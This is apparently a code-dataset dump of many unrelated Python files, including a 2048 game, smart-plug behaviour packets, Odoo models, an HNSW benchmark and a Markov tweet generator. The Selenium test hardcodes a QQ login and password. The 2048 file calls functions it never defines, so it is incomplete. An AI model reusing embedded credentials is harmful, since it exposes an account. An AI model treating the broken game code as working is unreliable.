a = [0, 0, 0, 0]
b = [0, 0, 0, 0]
c = [0, 0, 0, 0]
d = [0, 0, 0, 0]
from functions2048 import coolStart
import os


def _slide_line(line):
    """Slide one 4-cell row/column toward index 0, merging equal neighbours
    once per pair (standard 2048 rules).

    Returns (new_line, gained, changed): `gained` is the score earned by the
    merges and `changed` tells whether the line differs from the input, which
    is exactly the condition under which the original code set dontMove = 1
    (a slide happened or a merge happened).
    """
    tiles = [value for value in line if value != 0]
    merged = []
    gained = 0
    i = 0
    while i < len(tiles):
        if i + 1 < len(tiles) and tiles[i] == tiles[i + 1]:
            merged.append(tiles[i] * 2)
            gained += tiles[i] * 2
            i += 2
        else:
            merged.append(tiles[i])
            i += 1
    merged += [0] * (4 - len(merged))
    return merged, gained, merged != line


game = 1
print()
print()
while game == 1:
    start = input("\033[92m" + "Press \'s\' to start the game! (or \'x\' to EXIT): " + "\033[0m")
    if start == "s":
        score = 0
        dontMove = 1
        randNum()
        randNum()
        printing()
        game = 0
    elif start == "x":
        quit()
# The game starts here.  The original duplicated the slide/merge algorithm
# once per direction and once per row/column (~700 lines); all four
# directions now share _slide_line.
while game < 1:
    key = input("\033[92m" + "Select a direction and press enter (use \'x\' to EXIT): " + "\033[0m")
    if key in ("w", "s", "a", "d"):
        dontMove = 0
        grid = [a, b, c, d]
        for index in range(4):
            # 'w'/'s' act on columns, 'a'/'d' act on rows.
            if key in ("w", "s"):
                line = [grid[r][index] for r in range(4)]
            else:
                line = list(grid[index])
            # 's' and 'd' slide toward the high end: reverse, slide, reverse back.
            if key in ("s", "d"):
                line.reverse()
            new_line, gained, changed = _slide_line(line)
            if key in ("s", "d"):
                new_line.reverse()
            score += gained
            if changed:
                dontMove = 1
            # Write back in place so a/b/c/d stay the same list objects that
            # printing(), checking() and randNum() read.
            if key in ("w", "s"):
                for r in range(4):
                    grid[r][index] = new_line[r]
            else:
                grid[index][:] = new_line
        randNum()
        printing()
        checking()
    # Exit button: 'x'
    elif key == "x":
        print()
        print("\033[92m" + "Thank you for playing!" + "\033[0m")
        print()
        quit()
    # Wrong button handling
    else:
        print("Not valid key")
|
986,988 | c4ad3b39066cf20d1e555d259ad6274c7a40e59c | import json
from BluenetLib.lib.packets.behaviour.BehaviourSubClasses import ActiveDays, BehaviourTimeContainer, BehaviourTime, \
BehaviourPresence
from BluenetLib.lib.packets.behaviour.BehaviourTypes import BehaviourType, BehaviourTimeType, DAY_START_TIME_SECONDS_SINCE_MIDNIGHT
from BluenetLib.lib.util.DataStepper import DataStepper
from BluenetLib.lib.util.fletcher import fletcher32_uint8Arr
# Defaults shared by every BehaviourBase built without explicit arguments.
# NOTE(review): these are single shared instances, not per-behaviour copies —
# mutating them from one behaviour affects all behaviours using the defaults.
DEFAULT_ACTIVE_DAYS = ActiveDays()
DEFAULT_TIME = BehaviourTimeContainer(
    BehaviourTime().fromType(BehaviourTimeType.afterSunset),
    BehaviourTime().fromType(BehaviourTimeType.afterSunrise),
)
class BehaviourBase:
    """Base representation of a Crownstone behaviour (behaviour, twilight,
    smart timer) with chainable time/intensity setters.

    Serialized payload layout:
      - BehaviourType   1B
      - Intensity       1B
      - profileIndex    1B
      - ActiveDays      1B
      - From            5B
      - Until           5B
      - Presence       13B  (switch behaviour and smart timer)
      - End Condition  17B  (smart timer)
    """

    def __init__(self, profileIndex=0, behaviourType=BehaviourType.behaviour, intensity=100, activeDays=DEFAULT_ACTIVE_DAYS, time=DEFAULT_TIME, presence=None, endCondition=None, idOnCrownstone=None):
        # NOTE(review): DEFAULT_ACTIVE_DAYS / DEFAULT_TIME are shared
        # module-level instances; mutating self.activeDays on one behaviour
        # affects every behaviour built with the default — confirm intended.
        self.profileIndex = profileIndex
        self.behaviourType = behaviourType
        self.intensity = max(0, min(100, intensity))  # clamp to 0..100
        self.activeDays = activeDays
        self.fromTime = time.fromTime
        self.untilTime = time.untilTime
        self.presence = presence
        self.endCondition = endCondition
        self.idOnCrownstone = idOnCrownstone
        self.valid = True

    def setDimPercentage(self, value):
        """Set the dim intensity (0..100). Returns self for chaining."""
        self.intensity = value
        return self

    def setTimeAllday(self, dayStartTimeSecondsSinceMidnight=DAY_START_TIME_SECONDS_SINCE_MIDNIGHT):
        """Make the behaviour active for the whole (crownstone) day.

        Bug fix: the original fromTime assignment ended with a stray trailing
        comma, which stored a 1-element tuple instead of a BehaviourTime.
        """
        self.fromTime = BehaviourTime().fromType(BehaviourTimeType.afterMidnight, dayStartTimeSecondsSinceMidnight)
        self.untilTime = BehaviourTime().fromType(BehaviourTimeType.afterMidnight, dayStartTimeSecondsSinceMidnight)
        return self

    def setTimeWhenDark(self):
        """Active from sunset until sunrise. Returns self."""
        self.fromTime = BehaviourTime().fromType(BehaviourTimeType.afterSunset)
        self.untilTime = BehaviourTime().fromType(BehaviourTimeType.afterSunrise)
        return self

    def setTimeWhenSunUp(self):
        """Active from sunrise until sunset. Returns self."""
        self.fromTime = BehaviourTime().fromType(BehaviourTimeType.afterSunrise)
        self.untilTime = BehaviourTime().fromType(BehaviourTimeType.afterSunset)
        return self

    def setTimeFromSunrise(self, offsetMinutes = 0):
        """Start `offsetMinutes` after sunrise. Returns self."""
        self.fromTime = BehaviourTime().fromType(BehaviourTimeType.afterSunrise, offsetSeconds=60*offsetMinutes)
        return self

    def setTimeFromSunset(self, offsetMinutes = 0):
        """Start `offsetMinutes` after sunset. Returns self."""
        self.fromTime = BehaviourTime().fromType(BehaviourTimeType.afterSunset, offsetSeconds=60*offsetMinutes)
        return self

    def setTimeToSunrise(self, offsetMinutes = 0):
        """End `offsetMinutes` after sunrise. Returns self."""
        self.untilTime = BehaviourTime().fromType(BehaviourTimeType.afterSunrise, offsetSeconds=60*offsetMinutes)
        return self

    def setTimeToSunset(self, offsetMinutes = 0):
        """End `offsetMinutes` after sunset. Returns self."""
        self.untilTime = BehaviourTime().fromType(BehaviourTimeType.afterSunset, offsetSeconds=60 * offsetMinutes)
        return self

    def setTimeFrom(self, hours, minutes):
        """Start at a fixed clock time. Returns self."""
        self.fromTime = BehaviourTime().fromTime(hours, minutes)
        return self

    def setTimeTo(self, hours, minutes):
        """End at a fixed clock time. Returns self."""
        self.untilTime = BehaviourTime().fromTime(hours, minutes)
        return self

    def fromData(self, data):
        """Parse a serialized behaviour payload (layout in the class docstring).

        Sets self.valid = False on malformed input.  Bug fix: the success path
        previously fell off the end and returned None, while every error path
        returned self; it now returns self consistently.
        """
        payload = DataStepper(data)
        firstByte = payload.getUInt8()
        if not BehaviourType.has_value(firstByte):
            self.valid = False
            return self
        self.behaviourType = BehaviourType(firstByte)
        self.intensity = payload.getUInt8()
        self.profileIndex = payload.getUInt8()
        self.activeDays = ActiveDays().fromData(payload.getUInt8())
        self.fromTime = BehaviourTime().fromData(payload.getAmountOfBytes(5))   # bytes 4..8
        self.untilTime = BehaviourTime().fromData(payload.getAmountOfBytes(5))  # bytes 9..13
        if not self.fromTime.valid or not self.untilTime.valid:
            self.valid = False
            return self
        if self.behaviourType == BehaviourType.behaviour:
            if payload.length >= 14 + 13:
                self.presence = BehaviourPresence().fromData(payload.getAmountOfBytes(13))  # bytes 14..26
                if not self.presence.valid:
                    self.valid = False
                    return self
            else:
                self.valid = False
                return self
        if self.behaviourType == BehaviourType.smartTimer:
            # NOTE(review): per the documented layout a smart timer carries a
            # 13B presence block before the 17B end condition, but only 17
            # bytes are read here — confirm against the firmware format.
            if payload.length >= 14 + 13 + 17:
                presence = BehaviourPresence().fromData(payload.getAmountOfBytes(17))
                if not presence.valid:
                    self.valid = False
                    return self
                self.endCondition = presence
            else:
                self.valid = False
                return self
        return self

    def getPacket(self):
        """Serialize to a list of byte values in the documented layout."""
        arr = []
        arr.append(self.behaviourType.value)
        arr.append(self.intensity)
        arr.append(self.profileIndex)
        arr.append(self.activeDays.getMask())
        arr += self.fromTime.getPacket()
        arr += self.untilTime.getPacket()
        if self.presence is not None:
            arr += self.presence.getPacket()
        if self.endCondition is not None:
            arr += self.endCondition.presence.getPacket()
        return arr

    def getHash(self):
        """Fletcher-32 checksum of the (even-length padded) packet."""
        return fletcher32_uint8Arr(self._getPaddedPacket())

    def getDictionary(self, dayStartTimeSecondsSinceMidnight=DAY_START_TIME_SECONDS_SINCE_MIDNIGHT):
        """Build the JSON-style dict representation used by the cloud/app."""
        typeString = "BEHAVIOUR"
        if self.behaviourType == BehaviourType.twilight:
            typeString = "TWILIGHT"
        dataDictionary = {}
        if self.behaviourType == BehaviourType.twilight:
            dataDictionary["action"] = {"type": "DIM_WHEN_TURNED_ON", "data": self.intensity}
            dataDictionary["time"] = self._getTimeDictionary(dayStartTimeSecondsSinceMidnight)
        else:
            # behaviour and smart timer share the same format
            dataDictionary["action"] = {"type": "BE_ON", "data": self.intensity}
            dataDictionary["time"] = self._getTimeDictionary(dayStartTimeSecondsSinceMidnight)
            if self.presence is not None:
                dataDictionary["presence"] = self.presence.getDictionary()
            if self.endCondition is not None:
                endConditionDictionary = {}
                endConditionDictionary["type"] = "PRESENCE_AFTER"
                endConditionDictionary["presence"] = self.endCondition.getDictionary()
                dataDictionary["endCondition"] = endConditionDictionary
        returnDict = {"type": typeString, "data": dataDictionary, "activeDays": self.activeDays.getDictionary(),
                      "idOnCrownstone": self.idOnCrownstone, "profileIndex": self.profileIndex}
        return returnDict

    def _getTimeDictionary(self, dayStartTimeSecondsSinceMidnight=DAY_START_TIME_SECONDS_SINCE_MIDNIGHT):
        """Dict form of the active time window (ALL_DAY or RANGE)."""
        returnDict = {}
        # "all day" means both endpoints sit exactly on the crownstone day start
        if self.fromTime.timeType == BehaviourTimeType.afterMidnight and self.fromTime.offset == dayStartTimeSecondsSinceMidnight and self.untilTime.timeType == BehaviourTimeType.afterMidnight and self.untilTime.offset == dayStartTimeSecondsSinceMidnight:
            returnDict["type"] = "ALL_DAY"
            return returnDict
        # it's not always! construct the from and to parts.
        returnDict["type"] = "RANGE"
        returnDict["from"] = self.fromTime.getDictionary()
        returnDict["to"] = self.untilTime.getDictionary()
        return returnDict

    def _getPaddedPacket(self):
        """Packet padded with a trailing 0 to an even length (for fletcher32)."""
        packet = self.getPacket()
        if len(packet) % 2 != 0:
            packet.append(0)
        return packet

    def __str__(self):
        return json.dumps(self.getDictionary())
986,989 | c9037ef24463d9ef868dfbda629c4ca6758c5f1d | from market.models import DatabaseModel
class User(DatabaseModel):
    """A market participant identified by an immutable public key.

    The public key doubles as the database id; role and profile ids are the
    only mutable references, everything else is read-only after construction.
    """

    type = 'users'

    def __init__(self, public_key, time_added, role_id=None, profile_id=None, loan_request_ids=None, campaign_ids=None, mortgage_ids=None, investment_ids=None):
        super(User, self).__init__()
        self._public_key = public_key
        self._time_added = time_added
        self._role_id = role_id
        self._profile_id = profile_id
        # Fall back to fresh lists when no id collections were supplied.
        self._loan_request_ids = loan_request_ids or []
        self._campaign_ids = campaign_ids or []
        self._mortgage_ids = mortgage_ids or []
        self._investment_ids = investment_ids or []
        self._candidate = None

    @property
    def user_key(self):
        """The user's public key (also serves as the id)."""
        return self._public_key

    @property
    def time_added(self):
        """Timestamp at which the user entered the system."""
        return self._time_added

    @property
    def role_id(self):
        """Identifier of the user's role (writable)."""
        return self._role_id

    @role_id.setter
    def role_id(self, value):
        self._role_id = value

    @property
    def profile_id(self):
        """Identifier of the user's profile document (writable)."""
        return self._profile_id

    @profile_id.setter
    def profile_id(self, value):
        self._profile_id = value

    @property
    def loan_request_ids(self):
        """Ids of loan requests submitted by this user."""
        return self._loan_request_ids

    @property
    def campaign_ids(self):
        """Ids of campaigns this user participates in."""
        return self._campaign_ids

    @property
    def mortgage_ids(self):
        """Ids of mortgages linked to this user."""
        return self._mortgage_ids

    @property
    def investment_ids(self):
        """Ids of investments made by this user."""
        return self._investment_ids

    def generate_id(self, force=False):
        """Return the public key as the id; forcing regeneration is an error."""
        if force:
            raise IndexError("User key is immutable")
        return self.user_key
|
986,990 | aa2817acba8daf05ca353186e4faec4e4e9a52a1 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
__author__ = 'wan'
import os,sys
import string
import time
import unittest
import random
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common import action_chains as action
reload(sys)
sys.setdefaultencoding('utf-8')
"""关于京东账号登录的测试脚本."""
#set website url
url = 'https://passport.jd.com/new/login.aspx'
#QQ
qq = '3485126980'
qq_passwd = '098765!@#'
wx = ''
wx_passwd = ''
class TestEnvironment(unittest.TestCase):
    """Shared test environment.

    1) setUp opens a Chrome session and loads the login page.
    2) tearDown closes the browser window after each test.
    """
    def setUp(self):
        # Alternative drivers kept for reference (Firefox / Windows Chrome):
        #self.driver = webdriver.Firefox()
        #self.driver = webdriver.Chrome('C:\Program Files (x86)\Google\Chrome\Application\chromedriver')
        # NOTE(review): this path points at the Chrome app bundle on macOS, not
        # a chromedriver binary — confirm the driver location is correct.
        self.driver = webdriver.Chrome('/Applications/Google Chrome.app/Contents/MacOS/chromedriver')
        self.driver.get(url)
    def tearDown(self):
        # close() shuts the current window; driver.quit() would end the session.
        self.driver.close()
class TestLoginCooperationAccount(TestEnvironment):
    """Login through partner-site accounts, mainly QQ and WeChat."""

    def test_login_qq(self):
        """ TestCase 01: QQ login."""
        driver = self.driver
        # Switch to the QQ tab, enter its login iframe, and use the
        # account/password form instead of the QR code.
        driver.find_element_by_xpath("//ul/li[2]/a").click()
        driver.switch_to_window(driver.window_handles[0])
        driver.switch_to.frame(0)
        driver.find_element_by_xpath("//div[@id='bottom_qlogin']//a[@id='switcher_plogin']").click()
        driver.find_element_by_xpath("//div[@class='inputOuter']/input[@id='p']").send_keys(qq_passwd)
        driver.find_element_by_xpath("//div[@class='inputOuter']/input[@id='u']").send_keys(qq)
        driver.implicitly_wait(3)
        driver.find_element_by_xpath("//div[@class='submit']/a/input[@id='login_button']").click()
        time.sleep(5)

    def test_login_wx(self):
        """ TestCase 02: wx login."""
        # Bug fix: `self` was missing, so unittest raised a TypeError when
        # invoking this test method.
        pass

    def test_login_jdpay(self):
        """ TestCase 03: jd wallt login."""
        # Bug fix: `self` was missing, so unittest raised a TypeError when
        # invoking this test method.
        pass
def suite_cpt():
    """Build the suite of partner-account login test cases."""
    selected = ["test_login_qq"]
    return unittest.TestSuite([TestLoginCooperationAccount(name) for name in selected])

if __name__ == "__main__":
    unittest.TextTestRunner(verbosity=2).run(suite_cpt())
|
986,991 | c7d381ff0c30f1bf2b4a49f19a0b590a3f86395e | # Filename: moosegui.py
# Description: Graphical user interface of MOOSE simulator.
# Author: Subhasis Ray, Harsha Rani, Dilawar Singh
# Maintainer:
# Created: Mon Nov 12 09:38:09 2012 (+0530)
__author__ = 'Subhasis Ray , HarshaRani, Aviral Goel, NCBS Bangalore'
import sys
from PyQt5.QtWidgets import QApplication
from PyQt5 import QtGui, QtCore
from moosegui import config
from moosegui import MWindow as MWindow
app_ = None
def main():
    """Create the Qt application, show the MOOSE main window maximized and
    enter the event loop."""
    global app_
    app_ = QApplication(sys.argv)
    QtGui.qApp = app_
    window = MWindow.MWindow()
    window.setWindowState(QtCore.Qt.WindowMaximized)
    # Route uncaught exceptions into the GUI's error handler.
    sys.excepthook = window.handleException
    window.show()
    sys.exit(app_.exec_())

if __name__ == '__main__':
    main()
|
986,992 | 1eda40ef74f0ecf9bc5ed4a1fdde1f447a7563ef | from .arp_attack import ARPAttack |
class Emp:
    """Employee record (Python 2 style; emp1 plays the role of __init__)."""
    def emp1(self,name,age,salary):
        # Store the employee's basic fields and echo them to stdout.
        self.n = name
        self.a = age
        self.s = salary
        print "name:%r"%self.n + "Age:%r" %self.a + "salary:%r"%self.s
    def allowance(self):
        # Flat allowance granted to every employee.
        self.all = 1000
class Details:
    """Demonstrates combining an Emp's salary with its allowance."""
    def sala(self):
        # Builds a throwaway Emp (emp1 prints its fields as a side effect) and
        # prints salary + allowance when the salary exceeds the threshold.
        d = Emp()
        d.emp1("name",20,100001)
        d.allowance()
        if d.s > 10000:
            print d.s + d.all
        else:
            print "have not allowance"
# Demo: create an employee, then run the salary/allowance report.
x = Emp()
x.emp1("x",1,2)
x.allowance()
y = Details()
y.sala()
|
986,994 | bc32fbd68527e32d53c4d4ae031ac389482a47ff | from configparser import ConfigParser
import psycopg2
import psycopg2.extras as psql_extras
import pandas as pd
from typing import Dict
def load_connection_info(
    ini_filename: str
) -> Dict[str, str]:
    """Read the [postgresql] section of *ini_filename* into a plain dict."""
    config = ConfigParser()
    config.read(ini_filename)
    # ConfigParser.items(section) yields (option, value) pairs directly.
    return dict(config.items("postgresql"))
def insert_data(
    query: str,
    conn: psycopg2.extensions.connection,
    cur: psycopg2.extensions.cursor,
    df: pd.DataFrame,
    page_size: int
) -> None:
    """Bulk-insert every row of *df* via execute_values.

    Commits on success; on failure prints the error, rolls the transaction
    back and closes the cursor (the cursor stays open on success so the
    caller can reuse it).
    """
    rows = [tuple(record.to_numpy()) for _, record in df.iterrows()]
    try:
        psql_extras.execute_values(
            cur, query, rows, page_size=page_size)
    except Exception as error:
        print(f"{type(error).__name__}: {error}")
        print("Query:", cur.query)
        conn.rollback()
        cur.close()
    else:
        print("Query:", cur.query)
        conn.commit()
if __name__ == "__main__":
# host, database, user, password
conn_info = load_connection_info("db.ini")
# Connect to the "houses" database
connection = psycopg2.connect(**conn_info)
cursor = connection.cursor()
# Insert data into the "house" table
house_df = pd.DataFrame({
"id": [1, 2, 3],
"address": ["Street MGS, 23", "Street JHPB, 44", "Street DS, 76"]
})
house_query = "INSERT INTO house(id, address) VALUES %s"
insert_data(house_query, connection, cursor, house_df, 100)
# Insert data into the "person" table
person_df = pd.DataFrame({
"id": [1, 2, 3, 4],
"name": ["Michael", "Jim", "Pam", "Dwight"],
"house_id": [1, 2, 2, 3]
})
person_query = "INSERT INTO person(id, name, house_id) VALUES %s"
insert_data(person_query, connection, cursor, person_df, 100)
# Close all connections to the database
connection.close()
cursor.close()
|
986,995 | aef6afceaaef81d13dbb3bf5dcc1b3114da7bf55 | import movealgorithm
from .. import board as b
from ..board import Board
from ..squid import Squid
import logging
import copy
class PlacementSubtraction(movealgorithm.MoveAlgorithm):
    """Move algorithm that tracks every still-possible squid placement and
    targets the square covered by the most of them.

    NOTE(review): uses Python 2 tuple-parameter syntax in
    countPlacementsOnPosition — this module is not Python 3 compatible.
    """

    # Class-level cache of all placements enumerated from the first board
    # seen; deep-copied per instance so instances can prune independently.
    placementsTemplate = None

    def __init__(self, board, squidLengths):
        assert isinstance(board, Board), "Invalid parameter type"
        assert isinstance(squidLengths, list), "Invalid parameter type"
        # Build the expensive full enumeration only once per process.
        if PlacementSubtraction.placementsTemplate == None:
            PlacementSubtraction.placementsTemplate = PlacementSubtraction.countPlacementsOnBoard(board, squidLengths)
        self.placements = copy.deepcopy(PlacementSubtraction.placementsTemplate)

    @staticmethod
    def countPlacementsOnBoard(board, squidLengths):
        # Enumerate every distinct legal placement anywhere on the 8x8 board.
        placements = []
        for y in range(8):
            for x in range(8):
                pos = (x,y)
                for squidLength in squidLengths:
                    posPlacements = PlacementSubtraction.countPlacementsOnPosition(board, pos, squidLength)
                    # Deduplicate: the same squid is re-found from each of its cells.
                    placements += [p for p in posPlacements if not p in placements]
        return placements

    @staticmethod
    def countPlacementsOnPosition(board, (x, y), squidLength):
        # All horizontal and vertical placements of the given length that
        # cover (x, y) using only in-bounds, EMPTY squares.
        placements = []
        for axis in ["x", "y"]:
            for start in range(-squidLength+1, 1):
                squid = Squid([])
                complete = True
                for i in range(squidLength):
                    if axis == "x":
                        pos = (x + start + i, y)
                    else:
                        pos = (x, y + start + i)
                    if board.isOutOfBounds(pos) or board.getState(pos) != b.State.EMPTY:
                        complete = False
                        break
                    else:
                        squid.getPositions().append(pos)
                if complete:
                    placements.append(squid)
        return placements

    def countRemovablePlacements(self, pos):
        # Number of remaining candidate placements that cover pos.
        count = 0
        for squid in self.placements:
            if squid.contains(pos):
                count += 1
        return count

    def removePlacements(self, pos):
        # Discard every candidate placement covering pos (e.g. after a miss).
        self.placements = [squid for squid in self.placements if not squid.contains(pos)]

    def updateSquidLengths(self, squidLengths):
        # Keep only candidates whose length is still in play.
        self.placements = [squid for squid in self.placements if len(squid) in squidLengths]

    def placementSubtraction(self, board):
        # Greedy choice: pick the EMPTY square covered by the most candidate
        # placements, then prune those candidates from the pool.
        bestMove = None
        bestReduction = 0
        for y in range(8):
            for x in range(8):
                pos = (x,y)
                if board.getState(pos) == b.State.EMPTY:
                    reduction = self.countRemovablePlacements(pos)
                    if reduction > bestReduction:
                        bestMove = pos
                        bestReduction = reduction
        self.removePlacements(bestMove)
        return bestMove

    def findNextMove(self, board):
        """Return the next (x, y) position to target on *board*."""
        return self.placementSubtraction(board)
|
986,996 | 7a7dffde5776f6b77b66f018f1d0dce731d0f326 | # -*- coding: utf-8 -*-
# See LICENSE file for full copyright and licensing details.
from odoo import models, fields, api
from odoo.exceptions import ValidationError,UserError
class Location(models.Model):
    """Extend stock.location with an optional link to the owning campus."""
    _inherit = "stock.location"

    school_id = fields.Many2one('school.school', 'Campus', required=False)
class Picking(models.Model):
    """Extend stock.picking with an optional link to the owning campus."""
    _inherit = "stock.picking"

    school_id = fields.Many2one('school.school', 'Campus', required=False)
class StockWarehouse(models.Model):
    """Extend stock.warehouse with a link to the owning campus."""
    _inherit = "stock.warehouse"

    # Removed a stray trailing "|" that made this line a syntax error.
    school_id = fields.Many2one('school.school', string="Campus")
986,997 | 3a9df52fcc1dd9817c07054b9d864d542f125951 | # -*- coding: utf-8 -*-
import pickle
import pprint
import time
import h5py
import numpy as np
from pandas import DataFrame
import sys
sys.path.append('/Users/Ryan/code/python/hnsw-python')
from hnsw import HNSW
# Load the prebuilt HNSW index; the original left this file handle open
# for the life of the process.
with open('glove-25-angular-balanced.ind', 'rb') as fr:
    hnsw_n = pickle.load(fr)

variance_record = []
mean_record = []

# Keep the HDF5 file open only while its datasets are being read.
# (The unused 'distances', 'neighbors' and 'train' dataset handles from the
# original have been dropped.)
with h5py.File('glove-25-angular.hdf5', 'r') as f:
    test = f['test']
    # 20 repeated passes over the whole query set to estimate latency
    # mean/variance per pass.
    for j in range(20):
        print(j)
        time_record = []
        for query in test:
            search_begin = time.time()
            hnsw_n.search(query, 10)
            search_end = time.time()
            # Per-query latency in milliseconds.
            time_record.append((search_end - search_begin) * 1000)
        variance_n = np.var(time_record)
        mean_n = np.mean(time_record)
        pprint.pprint('variance: %f' % variance_n)
        pprint.pprint('mean: %f' % mean_n)
        variance_record.append(variance_n)
        mean_record.append(mean_n)

data = {
    'mean_balanced': mean_record,
    'variance_balanced': variance_record
}
df = DataFrame(data)
df.to_excel('variance_result_balanced_8.xlsx')
986,998 | d9253306fea6336be888d364543f2930df2466cb | import random
data = ['shop', 'cup', 'third']
def func_add(tovar):
    """Return the product name suffixed with a random count in [1, len(name)]."""
    count = random.randint(1, len(tovar))
    return f"{tovar}: {count}"
# Lazily apply func_add to every product name (map returns an iterator,
# consumed once by the list() call below).
data_tovars = map(func_add, data)
print(list(data_tovars))
# The source list is unchanged — map does not mutate its input.
print(data)
986,999 | 09ad3be9127dc67f399260c5efacfae9faeb814e | import json
import pandas as pd
import nltk
from collections import Counter
from numpy.random import choice
START = "____START____"
END = "____END____"
def sample_from_choices(choices):
    """Draw one key from *choices*, weighted by its (unnormalized) count.

    *choices* maps word -> count; counts are normalized into a probability
    vector for numpy.random.choice.
    """
    words = list(choices.keys())
    weights = list(choices.values())
    total = sum(weights)
    return choice(words, p=[w / total for w in weights])
def clean_up_tt(tweet):
    """Normalize curly quotes, the ellipsis and US abbreviations before tokenizing."""
    # Single-character normalizations in one C-level pass.
    tweet = tweet.translate(str.maketrans({"’": "'", "“": '"', "”": '"', "…": None}))
    # Order matters: strip the longer abbreviation before its prefix.
    tweet = tweet.replace("U.S.A.", "USA")
    tweet = tweet.replace("U.S.", "US")
    return tweet
def append_token(tweet, token):
    """Append *token* to *tweet*, adding a space only where English spacing
    rules call for one; the END marker is a no-op."""
    if token == END:
        return tweet
    if tweet == "":
        return token
    # Closing punctuation attaches directly to the preceding text.
    if token in "!%,.\'\":)?":
        return tweet + token
    # Opening "$" and "(" attach directly to the following token.
    if tweet[-1] in "$(":
        return tweet + token
    return tweet + " " + token
def tweet_from_token_list(token_list):
    """Render a token sequence as tweet text, dropping START/END markers."""
    text = ""
    markers = (START, END)
    for tok in token_list:
        if tok in markers:
            continue
        text = append_token(text, tok)
    return text
class MCTweet(list):
    """A tweet under construction, stored as a list of tokens starting with
    the START marker."""

    def __init__(self, start=START):
        self.append(start)

    def current_ngram(self, n):
        # Trailing n-gram of the token list: a bare token for n == 1,
        # otherwise a tuple (matching the keys of MCCorpus's count dicts).
        if n == 1:
            return self[-1]
        return tuple(self[-n:])

    def __len__(self):
        # NOTE: length of the *rendered* text in characters, NOT the token
        # count — MCCorpus.predict compares this against the 280-char limit.
        return len(self.formatted)

    @property
    def formatted(self):
        # Human-readable tweet text with START/END markers stripped.
        return tweet_from_token_list(self)
class MCCorpus:
    """Backoff Markov-chain tweet generator built from 1/2/3-gram counts.

    fit() accumulates successor counts; predict() samples tokens, preferring
    the trigram model and backing off to bigrams then unigrams whenever the
    higher-order successor table is too sparse.
    """

    def __init__(self, n=3):
        # n doubles as the backoff cutoff: a higher-order n-gram table is
        # only used when it offers at least this many distinct successors.
        self.n = n
        self.backoff_cutoff = n
        self.tokenizer = nltk.tokenize.TweetTokenizer()
        # ngram -> Counter of observed next tokens.
        self.onegrams = dict()
        self.twograms = dict()
        self.threegrams = dict()
        # Single-character tokens dropped entirely from training text.
        self.exclusion = "\"()"
        self.filter_out_url = True

    def filter_words(self, words):
        # Drop excluded tokens and (optionally) anything containing a URL.
        words = [w for w in words if w not in self.exclusion]
        if self.filter_out_url:
            words = [w for w in words if "https" not in w]
        # replacements. This is ugly and hacky, fix in a later version.
        # (Undoes clean_up_tt's USA/US normalization so output reads naturally.)
        for j, word in enumerate(words):
            if word == 'USA':
                words[j] = 'U.S.A.'
            if word == 'US':
                words[j] = 'U.S.'
        return words

    def fit(self, text_list):
        """Accumulate 1-, 2- and 3-gram successor counts from *text_list*."""
        for tweet in text_list:
            text = clean_up_tt(tweet)
            # Bracket each tweet with START/END so chain boundaries are learned.
            words = [START] + self.tokenizer.tokenize(text) + [END]
            words = self.filter_words(words)
            for word, nextword in zip(words, words[1:]):
                if word not in self.onegrams:
                    self.onegrams[word] = Counter()
                self.onegrams[word][nextword] += 1
            for word0, word1, nextword in zip(words, words[1:], words[2:]):
                if (word0, word1) not in self.twograms:
                    self.twograms[(word0, word1)] = Counter()
                self.twograms[(word0, word1)][nextword] += 1
            for word0, word1, word2, nextword in zip(words, words[1:], words[2:], words[3:]):
                if (word0, word1, word2) not in self.threegrams:
                    self.threegrams[(word0, word1, word2)] = Counter()
                self.threegrams[(word0, word1, word2)][nextword] += 1

    def predict(self, seed=START, limit_length=280):
        """Generate one tweet token-by-token until END is sampled.

        Restarts from scratch if the rendered text exceeds *limit_length*
        characters (len(MCTweet) is the rendered character count).
        """
        tweet = MCTweet(seed)
        while tweet.current_ngram(1) != END:
            # Back off 3-gram -> 2-gram -> 1-gram: use a higher-order table
            # only if it has at least backoff_cutoff distinct successors.
            if (tweet.current_ngram(3) in self.threegrams) and (
                    len(self.threegrams[tweet.current_ngram(3)]) >= self.backoff_cutoff):
                tweet.append(sample_from_choices(self.threegrams[tweet.current_ngram(3)]))
            elif (tweet.current_ngram(2) in self.twograms) and (len(self.twograms[tweet.current_ngram(2)]) >= self.backoff_cutoff):
                tweet.append(sample_from_choices(self.twograms[tweet.current_ngram(2)]))
            else:
                tweet.append(sample_from_choices(self.onegrams[tweet.current_ngram(1)]))
            if len(tweet) > limit_length:
                tweet = MCTweet(seed)
        return tweet
if __name__ == '__main__':
    # Train a bigram-cutoff corpus on the 250 most recent tweets.
    with open("tweets.json", encoding="utf8") as f:
        td = json.load(f)
    tweettext = [t['text'] for t in td[-250:]]
    corpus = MCCorpus(2)
    corpus.fit(tweettext)

    # Reject generated tweets whose first real token is junk punctuation.
    bad_first_tokens = ("...", ".", "$", "\"", "'")
    for _ in range(20):
        tweet = corpus.predict()
        while tweet[1] in bad_first_tokens:
            tweet = corpus.predict()
        print("TWEET: (len=%i)" % len(tweet))
        print(tweet.formatted)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.